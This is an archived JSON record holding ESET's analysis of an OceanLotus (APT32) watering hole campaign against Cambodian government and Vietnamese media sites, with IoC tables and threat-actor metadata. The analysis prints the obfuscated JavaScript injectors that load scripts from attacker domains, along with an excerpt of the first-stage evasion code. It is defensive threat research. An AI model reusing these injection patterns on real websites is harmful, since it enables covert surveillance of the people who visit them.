{
	"id": "96984459-eb47-4511-96a5-29d068f03f4b",
	"created_at": "2026-04-06T00:19:44.683408Z",
	"updated_at": "2026-04-10T03:36:22.057346Z",
	"deleted_at": null,
	"sha1_hash": "684315df0f073fbac567137a9c692eb12eede0f1",
	"title": "OceanLotus: New watering hole attack in Southeast Asia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 609636,
	"plain_text": "OceanLotus: New watering hole attack in Southeast Asia\r\nBy Matthieu Faou\r\nArchived: 2026-04-05 20:18:56 UTC\r\nESET researchers have discovered a new watering hole campaign targeting several websites in Southeast Asia, which is\r\nbelieved to have been active since September 2018. This campaign stands out because of its large scale, as we were able to\r\nidentify 21 compromised websites, some of which are particularly notable. Among the compromised websites were the\r\nMinistry of Defense of Cambodia, the Ministry of Foreign Affairs and International Cooperation of Cambodia, and several\r\nVietnamese newspaper or blog websites.\r\nAfter thorough analysis, we are highly confident that this campaign is run by the OceanLotus group [1], also known as\r\nAPT32 [2] and APT-C-00. OceanLotus is an espionage group active since at least 2012 [3], mainly interested in foreign\r\ngovernments and dissidents.\r\nThis campaign is believed to be an evolution of what Volexity researchers called OceanLotus Framework B, a watering hole\r\nscheme they documented in 2017 [4]. However, the attackers have stepped up their game to complicate and slow down\r\nanalysis of their malicious framework. Among the various improvements, they started using public key cryptography to\r\nexchange an AES session key, used to encrypt further communications, thus preventing security products from intercepting\r\nthe final payload. They also switched from HTTP to WebSocket to hide their malicious communications.\r\nESET researchers identified 21 distinct websites that had been compromised, each redirecting to a separate domain\r\ncontrolled by the attackers.\r\nFigure 1 shows the region targeted by this campaign.\r\nFigure 1 - Location of the compromised websites\r\nMost of the compromised domains are related to news media or the Cambodian government. The following table details the\r\ndifferent victims. 
We notified all of them in October but most are still serving malicious script injections at the time of\r\nwriting, two months after the first compromise. Thus, we encourage you not to visit these websites.\r\nCompromised domain Description\r\nbaotgm[.]net Media in Vietnamese (based in Arlington, Texas)\r\ncnrp7[.]org Cambodia National Rescue Party\r\nconggiaovietnam[.]net Related to Religion – In Vietnamese\r\ndaichungvienvinhthanh[.]com Related to Religion – In Vietnamese\r\ndanchimviet[.]info Media in Vietnamese\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 1 of 8\n\nCompromised domain Description\r\ndanviet[.]vn Media in Vietnamese\r\ndanviethouston[.]com Media in Vietnamese\r\nfvpoc[.]org Former Vietnamese Prisoners of Conscience\r\ngardencityclub[.]com Golf club in Phnom Penh, Kingdom of Cambodia\r\nlienketqnhn[.]org Media in Vietnamese\r\nmfaic.gov[.]kh Ministry of Foreign Affairs and International Cooperation of Cambodia\r\nmod.gov[.]kh Ministry of Defense of Cambodia\r\nmtgvinh[.]net Related to Religion – In Vietnamese\r\nnguoitieudung.com[.]vn Media in Vietnamese\r\nphnompenhpost[.]com Cambodian newspaper in English\r\nraovatcalitoday[.]com Unknown – In Vietnamese\r\nthongtinchongphandong[.]com Opposition media in Vietnamese\r\ntinkhongle[.]com Media in Vietnamese\r\ntoithichdoc.blogspot[.]com Blog in Vietnamese\r\ntrieudaiviet[.]com Unknown – In Vietnamese\r\ntriviet[.]news Media in Vietnamese\r\nTable 1 - Description of the compromised websites\r\nGenerally, in a watering hole attack, the adversaries compromise websites that are regularly visited by potential targets.\r\nHowever, in this attack, OceanLotus was also able to compromise some websites that attract large numbers of visitors in\r\ngeneral, not just their presumed targets. The following table shows the Alexa rank at the time of writing (the lower the rank,\r\nthe more visited) of the compromised websites. 
For instance, they compromised the Dan Viet newspaper website\r\n(danviet[.]vn), which is the 116th most visited website in Vietnam.\r\nDomain Alexa rank (global) Alexa rank (in the most popular country)\r\ndanviet[.]vn 12,887 116\r\nphnompenhpost[.]com 85,910 18,880\r\nnguoitieudung.com[.]vn 261,801 2,397\r\ndanchimviet[.]info 287,852 144,884\r\nbaotgm[.]net 675,669 119,737\r\ntoithichdoc.blogspot[.]com 700,470 11,532\r\nmfaic.gov[.]kh 978,165 2,149\r\nconggiaovietnam[.]net 1,040,548 15,368\r\nthongtinchongphandong[.]com 1,134,691 21,575\r\ntinkhongle[.]com 1,301,722 15,224\r\ndaichungvienvinhthanh[.]com 1,778,418 23,428\r\ntriviet[.]news 2,767,289 Not available\r\nmod.gov[.]kh 4,247,649 3,719\r\nraovatcalitoday[.]com 8,180,358 Not available\r\ncnrp7[.]org 8,411,693 Not available\r\nmtgvinh[.]net 8,415,468 Not available\r\ndanviethouston[.]com 8,777,564 Not available\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 2 of 8\n\nDomain Alexa rank (global) Alexa rank (in the most popular country)\r\nlienketqnhn[.]org 16,109,635 Not available\r\ngardencityclub[.]com 16,109,635 Not available\r\ntrieudaiviet[.]com 16,969,048 Not available\r\nfvpoc[.]org Not available Not available\r\nTable 2 - Alexa rank of the compromised websites\r\nAnalysis\r\nThe modus operandi is similar on all compromised websites. The attackers add a small piece of JavaScript code either in the\r\nindex page or in a JavaScript file hosted on the same server. The piece of code in Figure 2, slightly obfuscated, then loads\r\nanother script from a server controlled by the attackers. The following code, added in https://www.mfaic.gov[.]kh/wp-content/themes/ministry-of-foreign-affair/slick/slick.min.js, will load the file from\r\nhttps://weblink.selfip[.]info/images/cdn.js?from=maxcdn.\r\n(function() {\r\n var pt = \"http\";\r\n var l = document.createElement('script');\r\n l.src = pt + \"s://\" + arguments[0] + arguments[2] + arguments[3] + 'ip.' 
+ 'info/images/cdn.js?from=maxcdn';\r\n document.getElementsByTagName('body')[0].appendChild(l)\r\n})('web', 'a', 'link', '.self');\r\nFigure 2 – Piece of JavaScript code added to mfaic.gov[.]kh\r\nIn order to evade detection, they take the following measures:\r\nThey obfuscate the scripts to prevent static extraction of the final URL.\r\nThe URL looks like a real JavaScript library used by the website.\r\nThey use one different domain and URI per compromised website.\r\nThe script is different per compromised website. The following piece of code is the script inserted into another\r\ncompromised website:\r\nvar script = document.createElement(\"script\");\r\nvar i = 'crash-course';\r\nvar s = \"fzgbc knowsztall znfo\";\r\nvar _ = '/';\r\nvar e = \"VisitorIdentification.js?sa=\" + i;\r\nscript.async = true;\r\nscript.src = \"htt\" + \"ps:\" + _ + _ + s.split(\" \").map(x =\u003e x.replace(\"z\", \"i\")).join(\".\") + _ + e;\r\nvar doc = document.getElementsByTagName('script')[0];\r\ndoc.parentNode.insertBefore(script, doc);\r\nFigure 3 - Another piece of JavaScript inserted in a targeted website\r\nFirst stage\r\nDepending on the location of the IP address of the visitor, the first stage server, e.g. weblink.selfip[.]info for mfaic.gov[.]kh,\r\ndelivers either a decoy script (a random legitimate JavaScript library) or the first stage script (SHA-1:\r\n2194271C7991D60AE82436129D7F25C0A689050A for example). 
Not all the servers have a location check but when it is\r\nenabled, only visitors from Vietnam and Cambodia actually receive the malicious script.\r\nThe first stage script contains several checks to evade detection, as shown in Figure 4.\r\n[…]\r\nfunction t(n) {\r\n var r = this;\r\n !function (t, n) {\r\n if (!(t instanceof n))\r\n throw new TypeError('Cannot call a class as a function');\r\n }(this, t), this.t = {\r\n o: null,\r\n s: !0\r\n }, this.scr = !0, this.r(), this.i = !0, window.addEventListener('scroll', function () {\r\n r.i || r.scr \u0026\u0026 !r.t.s \u0026\u0026 (r.scr = !1, r.c(n)), r.i = !1;\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 3 of 8\n\n});\r\n}\r\nreturn t.prototype.r = function () {\r\n var t = this;\r\n setInterval(function () {\r\n var n = window.outerWidth - window.innerWidth \u003e 160, r = window.outerHeight - window.innerHeight \u003e 160, e = n ? 'v\r\n r \u0026\u0026 n || !(window.Firebug \u0026\u0026 window.Firebug.chrome \u0026\u0026 window.Firebug.chrome.isInitialized || n || r) ? (t.t.s = !\r\n }, 500);\r\n}\r\n […]\r\nFigure 4 - First stage JavaScript payload\r\nThe script will wait until the victim scrolls on the page. It also checks the resolution of the window and whether Firebug, a\r\nbrowser extension used to analyze webpages, is enabled. If either of the checks fails, it stops the execution.\r\nThen, it decrypts the Command \u0026 Control domain using a custom algorithm. For instance,\r\n3B37371M1B1B382R332V1A382W36392W2T362T1A322T38 will be decrypted to wss://tcog.thruhere[.]net. 
For each\r\nfirst stage domain, the attackers also register a different second stage domain, each one being hosted on a different server.\r\nThe code in Figure 5 is an equivalent, in Python, of the decryption function.\r\ndef decrypt(encrypted_url):\r\n    # each pair of base-36 digits encodes one character code\r\n    s = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n    return \"\".join(chr(s.index(encrypted_url[e]) * 36 + s.index(encrypted_url[e+1])) for e in range(0, len(encrypted_url), 2))\r\nFigure 5 - Python code to decrypt the C\u0026C servers\r\nOnce the C\u0026C address is decrypted, the script sends a unique string of 15 digits, then receives and executes a second-stage\r\nscript. All communications are performed through WebSocket over SSL. This protocol allows full duplex communication\r\nbetween a client and a server. It means that, once the client establishes a connection, a server can send data to the client even\r\nif the client did not send a request. However, in this particular case, the principal goal of using WebSocket seems to be to\r\nevade detection.\r\nSecond stage\r\nThe second stage script is actually a reconnaissance script. The OceanLotus developers reused Valve’s fingerprintjs2 library,\r\navailable on GitHub, slightly modifying it in order to add network communication and a custom report.\r\nFigure 6 describes the different actions executed by the script. All the communications go through the WebSocket session\r\nopened by the first stage.\r\nFigure 6 - Flow of the second stage payload\r\nThe communication is encrypted using an AES session key, generated by the server. It is encrypted with an RSA 1024-bit\r\npublic key and sent to the client. 
Thus, it is not possible to decrypt the communications between the client and the server.\r\nIn comparison to the previous iterations of their watering hole framework, this will make it much more difficult for\r\ndefenders, because the data sent over the network cannot be detected then decrypted. This will prevent network detection of\r\nthe data. The public key sent by the server is always the same and is available in the IoCs section.\r\nThis recon script builds a report, similar to the one shown below, and sends it to the second stage C\u0026C server.\r\n{\r\n \"history\": {\r\n \"client_title\": \"Ministry%20of%20Foreign%20Affairs%20and%20International%20Cooperation%20-\",\r\n \"client_url\": \"https://www.mfaic.gov.kh/\",\r\n \"client_cookie\": \"\",\r\n \"client_hash\": \"\",\r\n \"client_referrer\": \"https://www.mfaic.gov.kh/foreign-ngos\",\r\n \"client_platform_ua\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.344\r\n \"client_time\": \"2018-10-21T12:43:25.254Z\",\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 5 of 8\n\n\"timezone\": \"Asia/Bangkok\",\r\n \"client_network_ip_list\": [\r\n \"192.168.x.x\",\r\n \"x.x.x.x\"\r\n ],\r\n \"client_api\": \"wss://tcog.thruhere.net/\",\r\n \"client_zuuid\": \"defaultcommunications39e10c84a0546508c58d48ae56ab7c7eca768183e640a1ebbb0cceaef0bd07cedefaultcommunica\r\n \"client_uuid\": \"a612cdb028e1571dcab18e4aa316da26\"\r\n },\r\n \"navigator\": {\r\n \"plugins\": {\r\n \"activex\": false,\r\n \"cors\": true,\r\n \"flash\": false,\r\n \"java\": false,\r\n \"foxit\": true,\r\n \"phonegap\": false,\r\n \"quicktime\": false,\r\n \"realplayer\": false,\r\n \"silverlight\": false,\r\n \"touch\": false,\r\n \"vbscript\": false,\r\n \"vlc\": false,\r\n \"webrtc\": true,\r\n \"wmp\": false\r\n },\r\n \"_screen\": {\r\n \"width\": 1920,\r\n \"height\": 1080,\r\n \"availWidth\": 1920,\r\n \"availHeight\": 1080,\r\n 
\"resolution\": \"1920x1080\"\r\n },\r\n \"_plugins\": [\r\n[...]\r\nFigure 7 - Fingerprint report\r\nThis report is nearly identical to the report generated from OceanLotus Framework B, documented by Volexity researchers\r\nin 2017. The different sections are similar and they include identical typos. Thanks to these similarities and the location of\r\nthe targets, we are highly confident that OceanLotus runs this campaign.\r\nThe report generated contains detailed information about the victim browser and the website visited: the user-agent, the\r\nHTTP Referer, the local and external IP addresses, the browser plugins and the browser’s configured language preferences.\r\nAlso, there are two unique identifiers per machine, called client_zuuid and client_uuid. They are probably used to identify\r\nusers and track them across visits. These identifiers were actually already present in the 2017 version of the framework and\r\nclient_uuid was computed in a similar way.\r\nThe client_zuuid is the concatenation of the different deviceId values contained in\r\nnavigator.mediaDevices.enumerateDevices. The devices are the external devices accessible to the browser, such as cameras\r\nor microphones. Thus, this value should be the same for a given user during their different visits from the same computer.\r\nThe client_uuid is an MD5 hash of some fingerprint information extracted by fingerprintjs2. Among the collected information\r\nare the browser user-agent, the language, the time zone, the browser plugins, and the fonts available in the browser. Again,\r\nthis value should be identical across visits, unless, for example, the user updates the browser or uses a different device.\r\nFinally, the server can send additional JavaScript code to the victimized computer, probably the actual payload.\r\nUnfortunately, due to the use of an AES session key to encrypt the communications, we were not able to identify in-the-wild\r\nexamples of payloads sent by the attackers. 
In addition, the payloads are only delivered to specific targets. Thus, it was not\r\npossible to get them using a test machine. However, according to previous reports, these OceanLotus watering hole\r\ncampaigns aim to phish their victims. For example, Volexity reported that users were shown a pop-up asking to approve\r\nOAuth access to the victim’s Google account for an OceanLotus Google App. Using this technique, attackers can get access\r\nto the victim’s contacts and emails.\r\nNetwork infrastructure\r\nIn order to be as stealthy as possible, the OceanLotus operators registered one first stage and one second stage domain per\r\ncompromised website. Each domain is hosted on a separate server with a distinct IP address. They registered at least 50\r\ndomains and 50 servers for this campaign.\r\nWhile most of the first-stage domains were registered on free domain name services, most of the second stage domains are\r\npaid domain names. They also mimic genuine websites in order to seem legitimate. Table 3 shows some services mimicked\r\nby the attackers.\r\nC\u0026C domain Legitimate domain\r\ncdn-ampproject[.]com cdn.ampproject.com\r\nbootstraplink[.]com getbootstrap.com\r\nsskimresources[.]com s.skimresources.com\r\nwidgets-wp[.]com widgets.wp.com\r\nTable 3 - Legitimate websites mimicked by the attackers\r\nThe number of domains used and their similarity to legitimate websites probably makes them harder for a human analyst\r\nreviewing network traffic to spot.\r\nConclusion\r\nDespite being actively tracked by many researchers, the OceanLotus group is still very busy attacking targets in Southeast\r\nAsia. They also regularly improve their toolset, including their watering hole framework and their Windows and MacOS\r\nmalware. 
The recent updates to their watering hole framework, highlighted in this blog, show a level of sophistication never\r\nbefore seen for OceanLotus. This is yet another reminder that this APT group should be closely tracked.\r\nIn order to limit the number of victims, we notified each compromised website owner and explained how to remove the\r\nmalicious JavaScript code, although some seem very resistant to being informed or helped.\r\nESET Researchers will continue tracking any development of the OceanLotus toolset. Indicators of Compromise can also be\r\nfound on GitHub. For any inquiries, or to make sample submissions related to the subject, contact us at\r\nthreatintel@eset.com\r\nReferences\r\n[1] ESET Research, \"OceanLotus: Old techniques, new backdoor,\" 03 2018. [Online]. Available: https://web-assets.esetstatic.com/wls/2018/03/ESET_OceanLotus.pdf.\r\n[2] N. Carr, \"Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations,\" FireEye, 14 05 2017.\r\n[Online]. Available: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html.\r\n[3] Sky Eye Lab, \"OceanLotus APT Report Summary,\" 29 05 2015. [Online]. Available:\r\nhttp://blogs.360.cn/post/oceanlotus-apt.html.\r\n[4] S. K. S. A. Dave Lassalle, \"OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian\r\nNations, the Media, Human Rights Groups, and Civil Society,\" Volexity, 06 11 2017. [Online]. 
Available:\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/.\r\nIndicators of Compromise (IoCs)\r\nFiles\r\nDescription SHA-1 SHA-256\r\nFirst stage\r\nscript\r\n2194271C7991D60AE82436129D7F25C0A689050A 1EDA0DE280713470878C399D3FB6C331BA0FADD0BD9802ED98AE\r\nSecond\r\nstage script\r\n996D0AC930D2CDB16EF96EDC27D9D1AFC2D89CA8 8B824BE52DE7A8723124BAD5A45664C574D6E905F300C35719F1E6\r\nNetwork IoCs\r\nCompromised website 1st stage IP address 2nd stage IP address\r\nbaotgm[.]net arabica.podzone[.]net 178.128.103.24 10cm.mypets[.]ws 178.128.100.189\r\ncnrp7[.]org utagscript[.]com 206.189.88.50 optnmstri[.]com 159.65.134.146\r\nconggiaovietnam[.]net lcontacts.servebbs[.]net 178.128.219.207 imgincapsula[.]com 209.97.164.158\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 7 of 8\n\nCompromised website 1st stage IP address 2nd stage IP address\r\ndaichungvienvinhthanh[.]com sskimresources[.]com 178.128.90.102\r\nsecure-imrworldwide[.]com\r\n178.128.90.109\r\ndanchimviet[.]info wfpscripts.homeunix[.]com 178.128.223.102\r\ncdn-ampproject[.]com\r\n178.128.24.201\r\ndanviet[.]vn cdnscr.thruhere[.]net 178.128.98.139 io.blogsite[.]org 178.128.98.89\r\ndanviethouston[.]com your-ip.getmyip[.]com 178.128.103.74 [Unknown] [Unknown]\r\nfvpoc[.]org gui.dnsdojo[.]net 178.128.28.93 cdnazure[.]com 209.97.164.96\r\ngardencityclub[.]com figbc.knowsitall[.]info 178.128.103.207\r\nichefbcci.is-a-chef[.]com\r\n206.189.85.162\r\nlienketqnhn[.]org tips-renew.webhop[.]info 159.65.7.45 cyhire.cechire[.]com 178.128.103.79\r\nmfaic.gov[.]kh weblink.selfip[.]info 178.128.103.202 tcog.thruhere[.]net 178.128.107.83\r\nmfaic.gov[.]kh s0-2mdn[.]net 104.248.144.178 p-typekit[.]com 104.248.144.136\r\nmod.gov[.]kh static.tagscdn[.]com 206.189.95.214 pagefairjs[.]com 159.65.137.109\r\nmtgvinh[.]net metacachecdn[.]com 178.128.209.153 
bootstraplink[.]com 159.65.129.241\r\nnguoitieudung.com[.]vn s-adroll[.]com 128.199.159.127\r\nplayer-cnevids[.]com\r\n128.199.159.60\r\nphnompenhpost[.]com tiwimg[.]com 206.189.89.121 tiqqcdn[.]com 206.189.47.116\r\nraovatcalitoday[.]com widgets-wp[.]com 178.128.90.107 cdn-tynt[.]com 142.93.75.192\r\nthongtinchongphandong[.]com lb-web-stat[.]com 159.65.128.57 benchtag2[.]com 178.128.90.108\r\ntinkhongle[.]com cdn1.shacknet[.]us 142.93.127.120 scdn-cxense[.]com 142.93.75.161\r\ntoithichdoc.blogspot[.]com assets-cdn.blogdns[.]net 178.128.28.89 cart.gotdns[.]com 206.189.145.242\r\ntrieudaiviet[.]com html5.endofinternet[.]net 178.128.90.182\r\neffecto-azureedge[.]net\r\n142.93.71.92\r\ntriviet[.]news ds-aksb-a.likescandy[.]com 159.65.137.144 labs-apnic[.]net 178.128.90.138\r\n[Unknown] pixel1.dnsalias[.]net 142.93.116.157 ad-appier[.]com 178.128.90.66\r\n[Unknown] trc.webhop[.]net 178.128.90.223\r\nstatic-addtoany[.]com\r\n142.93.75.172\r\n[Unknown] nav.neat-url[.]com 178.128.103.205\r\nstraits-times.is-an-actor[.]com\r\n178.128.107.24\r\nRSA Public Key sent by the server\r\n-----BEGIN PUBLIC KEY-----\r\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDI8O2kXpKec4MBVeF2g86GtT2X\r\n/ABJB2M+urEvxJStRuL/+u/a9oJ6XL4JTFceYqJiSsXvwD/wDfgI00zCdmJ7xgw+\r\nrpGyuSntLH2Ox5oVxTTUQB791WJByDjtKXYBHpIBrmePG1EcnTlfBhgHhpAeZEao\r\nhEXZ94it73j02h+JtQIDAQAB\r\n-----END PUBLIC KEY-----\r\nSource: https://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nhttps://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/"
	],
	"report_names": [
		"oceanlotus-new-watering-hole-attack-southeast-asia"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434784,
	"ts_updated_at": 1775792182,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/684315df0f073fbac567137a9c692eb12eede0f1.pdf",
		"text": "https://archive.orkl.eu/684315df0f073fbac567137a9c692eb12eede0f1.txt",
		"img": "https://archive.orkl.eu/684315df0f073fbac567137a9c692eb12eede0f1.jpg"
	}
}